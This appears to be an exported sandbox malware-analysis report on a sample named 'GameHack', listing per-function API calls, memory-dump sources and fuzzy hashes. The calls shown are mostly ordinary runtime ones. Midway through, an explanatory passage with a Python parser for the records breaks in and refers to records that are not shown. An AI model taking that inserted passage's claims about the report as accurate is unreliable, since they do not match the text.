                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00EF2185
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: afccfcc59e04a28da77d1cafdee620c36a80dc3176005179e12c8c47324bff6b
                                      • Instruction ID: 5cbad3863081aa1993fd2fbf6e23530a485024b5fed42b1ca005a461029610ee
                                      • Opcode Fuzzy Hash: afccfcc59e04a28da77d1cafdee620c36a80dc3176005179e12c8c47324bff6b
                                      • Instruction Fuzzy Hash: 9ED0A92520A30E247E0826B068420F82384A852BB83E03B8EE320BA0E1EF118204B01A
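The per-function records in this section all share one layout: an "APIs" list of resolved calls in the form `Name.MODULE(args), ref: address` (with "Part of subcall function" entries for callees), the memory-dump provenance, and the "Similarity" identifiers. The following is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: a small Python parser for that text layout that pulls out the API names, the module each call resolved to, any literal string arguments the sandbox recovered (for instance the `Crypt32.dll` passed to `LoadLibraryW` in the `DirectoryLibraryLoadSystem` record above), and indexes records by their Instruction Fuzzy Hash. The sample text is constructed from the `DirectoryLibraryLoadSystem` and `Value___vcrt____vcrt_uninitialize_ptdtry_get_function` records above; the "Download File" suffix it strips is link text left by page extraction, and the regular expression, class names and helper functions are this example's own assumptions about the layout, not a documented export format.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two per-function records copied from the report layout above.
SAMPLE = """\
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
• LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
Memory Dump Source
• Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
• Instruction Fuzzy Hash: 94E0127690115CAADB219AA5AC05FD6B7ACFF09392F0404A6B948E3104DAB49A848BA0
APIs
  • Part of subcall function 00EF329A: try_get_function.LIBVCRUNTIME ref: 00EF32AF
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EF217A
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00EF2185
Memory Dump Source
• Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
• Instruction Fuzzy Hash: 9ED0A92520A30E247E0826B068420F82384A852BB83E03B8EE320BA0E1EF118204B01A
"""

SECTION_HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Argument placeholders: '?' (unresolved) or an 8-hex-digit value (pointer/number).
PLACEHOLDER = re.compile(r"^(\?|[0-9A-F]{8})$")
# Assumed shape of one API line; the arguments are optional and the "ref:" address is required.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str          # module the sandbox resolved the call to (KERNELBASE, GDIPLUS, ...)
    args: list
    ref: str             # address of the call site in the dumped image
    subcall_of: Optional[str] = None   # set when the line came from a "Part of subcall" entry


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)      # "API ID", "Instruction Fuzzy Hash", ...
    associated: list = field(default_factory=list)  # associated memory dump names


def parse_records(text: str) -> list:
    """Split the report text into FunctionRecords; each "APIs" header starts a new record."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                records.append(FunctionRecord())
            continue
        if not records:
            continue  # text before the first "APIs" header is the tail of an earlier record
        rec = records[-1]
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                rec.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        key, _, value = line.lstrip("• ").partition(":")
        value = value.strip().removesuffix("Download File").strip()  # drop extraction link text
        if key.strip() == "Associated":
            rec.associated.append(value)
        else:
            rec.fields[key.strip()] = value
    return records


def api_names(rec: FunctionRecord, include_subcalls: bool = False) -> list:
    """Names of the APIs the function calls directly (or, optionally, via listed subcalls)."""
    return [c.name for c in rec.calls if include_subcalls or c.subcall_of is None]


def string_arguments(rec: FunctionRecord) -> list:
    """Literal arguments the sandbox recovered, e.g. a DLL name handed to LoadLibraryW."""
    return [a for c in rec.calls for a in c.args if a and not PLACEHOLDER.match(a)]


def index_by_fuzzy_hash(records) -> dict:
    """Map Instruction Fuzzy Hash -> record, for matching functions across samples."""
    return {r.fields["Instruction Fuzzy Hash"]: r
            for r in records if "Instruction Fuzzy Hash" in r.fields}


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("API ID"), api_names(rec, include_subcalls=True), string_arguments(rec))
```

Running it on a whole exported report gives a quick triage view: which dumped functions touch file deletion, library loading or COM, and which literal strings (DLL names, paths) were recovered as arguments, without scrolling through every record; the fuzzy-hash index lets the same records be matched against a second sample's export.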
                                      APIs
                                      • DloadLock.DELAYIMP ref: 00EEDC73
                                      • DloadProtectSection.DELAYIMP ref: 00EEDC8F
                                        • Part of subcall function 00EEDE67: DloadObtainSection.DELAYIMP ref: 00EEDE77
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Dload$Section$LockObtainProtect
                                      • String ID:
                                      • API String ID: 731663317-0
                                      • Opcode ID: bc672ea53b99b26f8eb3e170cb3195d2dd53f192c11f34c5191659381159d886
                                      • Instruction ID: 3fff6dea4096d6e66ca69488043487899f13627a76722416262f7f74479ca705
                                      • Opcode Fuzzy Hash: bc672ea53b99b26f8eb3e170cb3195d2dd53f192c11f34c5191659381159d886
                                      • Instruction Fuzzy Hash: 80D0C9705082CC4AC211EB169D5A75D72B1B7047D9F643602A106F76A4DFE44480E606
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 7e863e54004dacd7bb24c49ab950e5f94e09a0834ea27a9da87417ba87859e18
                                      • Instruction ID: 3b909c082d538ba616f2a0ecbdd465293a1d41e3409c5500210f047450c8e9f7
                                      • Opcode Fuzzy Hash: 7e863e54004dacd7bb24c49ab950e5f94e09a0834ea27a9da87417ba87859e18
                                      • Instruction Fuzzy Hash: 12C01232058208BECB412BB0ED09D2FBBAABBA4222F05C908B6A5C0060C238C010EB11
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 84d40d658977893bb116c4303a06f10178ee53bd0fe668cff28e815ca497582f
                                      • Instruction ID: c758ced28fc0a8a106bd47e2f16f18bca5b96ce9873b75edaca8d6ae7507a6de
                                      • Opcode Fuzzy Hash: 84d40d658977893bb116c4303a06f10178ee53bd0fe668cff28e815ca497582f
                                      • Instruction Fuzzy Hash: D3C19030A04254AFEF15CF68C494BA97BA5EF06314F1860FBDC45AB386DB319946CB61
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 2b744c657bb33540fd932d38f1c5eb91f782cea72f7fee52ed689e5b470453cd
                                      • Instruction ID: 41cfe9ba615d5e0121f6760adbe61242a0784ea97d871988de378d043f2c64c7
                                      • Opcode Fuzzy Hash: 2b744c657bb33540fd932d38f1c5eb91f782cea72f7fee52ed689e5b470453cd
                                      • Instruction Fuzzy Hash: 6671CE71100B449EDB25DF30CC41AEBB7E9EF14301F44596FE5AB67242DA326A4ADF12
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED8384
                                        • Part of subcall function 00ED1380: __EH_prolog.LIBCMT ref: 00ED1385
                                        • Part of subcall function 00ED1380: new.LIBCMT ref: 00ED13FE
                                        • Part of subcall function 00ED19A6: __EH_prolog.LIBCMT ref: 00ED19AB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 1c290975bcd00a2323d4d7f6105e13eacfb7bef737567c4fda561d5c8bc245d5
                                      • Instruction ID: 14f3ae089138688bd38d5ff0203eb024ef177c68ec7055d81eb8f34b4c0cf98a
                                      • Opcode Fuzzy Hash: 1c290975bcd00a2323d4d7f6105e13eacfb7bef737567c4fda561d5c8bc245d5
                                      • Instruction Fuzzy Hash: F741D2318406589ADB20DB60CD51BEA73A8EF10304F0450EBE59AB3293DF755ECADB50
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED1E05
                                        • Part of subcall function 00ED3B3D: __EH_prolog.LIBCMT ref: 00ED3B42
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 556f6aa515134a90792e6eb107bb72eb793a03a2a7355bc396142686a0cea3c8
                                      • Instruction ID: dd0f34dfb2e8b32725ece4c2bccf4f9ab0565868e9356af1636cb7aded3f21b9
                                      • Opcode Fuzzy Hash: 556f6aa515134a90792e6eb107bb72eb793a03a2a7355bc396142686a0cea3c8
                                      • Instruction Fuzzy Hash: 2D212472904248AECB15EFA9D9419EEFBF6FF58300B1011AEE845B7351CB325E11DB60
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00EEA7C8
                                        • Part of subcall function 00ED1380: __EH_prolog.LIBCMT ref: 00ED1385
                                        • Part of subcall function 00ED1380: new.LIBCMT ref: 00ED13FE
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 70cb377b2bb7fb191881b3aa4b0fff3bd378966d7eb6bed672d768373f0753d0
                                      • Instruction ID: 425cb6ff825096e18c250b0e3f208303906da2beeb760d7001968bb1d3303a63
                                      • Opcode Fuzzy Hash: 70cb377b2bb7fb191881b3aa4b0fff3bd378966d7eb6bed672d768373f0753d0
                                      • Instruction Fuzzy Hash: 19215A71C0428DAACB15DF95C9529EEBBF4EF19304F0414EEE809B7242DB356E069BA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                        • Part of subcall function 00EF85A9: RtlAllocateHeap.NTDLL(00000008,00F03958,00000000,?,00EF905A,00000001,00000364,?,?,?,00EDD25E,?,00BB1600,00000063,00000004,00EDCFE0), ref: 00EF85EA
                                      • _free.LIBCMT ref: 00EFBBF6
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      APIs
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00F03958,00000000,?,00EF905A,00000001,00000364,?,?,?,00EDD25E,?,00BB1600,00000063,00000004,00EDCFE0), ref: 00EF85EA
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED5BDC
                                        • Part of subcall function 00EDB07D: __EH_prolog.LIBCMT ref: 00EDB082
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      APIs
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00EDA4F5
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      APIs
                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00EE06B1
                                      Similarity
                                      • API ID: ExecutionStateThread
                                      • String ID:
                                      • API String ID: 2211380416-0
                                      APIs
                                      • GdipAlloc.GDIPLUS(00000010), ref: 00EE9D81
                                        • Part of subcall function 00EE9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00EE9B30
                                      Similarity
                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                      • String ID:
                                      • API String ID: 1915507550-0
                                      APIs
                                      • GetFileType.KERNELBASE(000000FF,00ED9887), ref: 00ED9995
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00EED43F
                                        • Part of subcall function 00EEAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EEAC85
                                        • Part of subcall function 00EEAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEAC96
                                        • Part of subcall function 00EEAC74: IsDialogMessageW.USER32(00010486,?), ref: 00EEACAA
                                        • Part of subcall function 00EEAC74: TranslateMessage.USER32(?), ref: 00EEACB8
                                        • Part of subcall function 00EEAC74: DispatchMessageW.USER32(?), ref: 00EEACC2
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cde552ad0d4745e541c4fd59d815664283bc3659146c9ae469fd9dc8e6846604
                                      • Instruction ID: 083209ecdbd9c42fa588452b94fc9ef07fc8f0a238b664e365036003c4705376
                                      • Opcode Fuzzy Hash: cde552ad0d4745e541c4fd59d815664283bc3659146c9ae469fd9dc8e6846604
                                      • Instruction Fuzzy Hash: 75B012A136D4466C314CB1076E16D36024CC5C0B20330901AB00DF02C1D4409C0F7432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: f845d2038514a402e15b6fb07dabe55626b0e8b399298ff5e2b61c689156d930
                                      • Instruction ID: 271a3821f4305fce32210976bbb40fb31b67b0e82d62d957839536622bc0d36a
                                      • Opcode Fuzzy Hash: f845d2038514a402e15b6fb07dabe55626b0e8b399298ff5e2b61c689156d930
                                      • Instruction Fuzzy Hash: 8BB012A136D58A6C318CB1067D16D36024CC5C0B20330911AB00DF02C1D4809C8A7432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 1a32b8f7c540a07389337905af26fc33807002233b3c6839c926c33a28ed733e
                                      • Instruction ID: 119c207f72262d849e1743d6c482157d006d538048d007a64b5de0ad93b0797c
                                      • Opcode Fuzzy Hash: 1a32b8f7c540a07389337905af26fc33807002233b3c6839c926c33a28ed733e
                                      • Instruction Fuzzy Hash: B4B012B136D4466C314CB1066D16D36025CC5C1B20330901AB40DF01C1D4409C057432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b3e8d79e5033e798627b37bf8de66a55132075d9ad7997fdf3f22ced9db35af8
                                      • Instruction ID: 642d51b235705b49c294fe1f0101eae492a084b67e448661b241106d4e45b750
                                      • Opcode Fuzzy Hash: b3e8d79e5033e798627b37bf8de66a55132075d9ad7997fdf3f22ced9db35af8
                                      • Instruction Fuzzy Hash: D1B012A536D54A6C314CB1066D56D3B024CF5C0B20330501AB40DF01C1D5409C057532
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
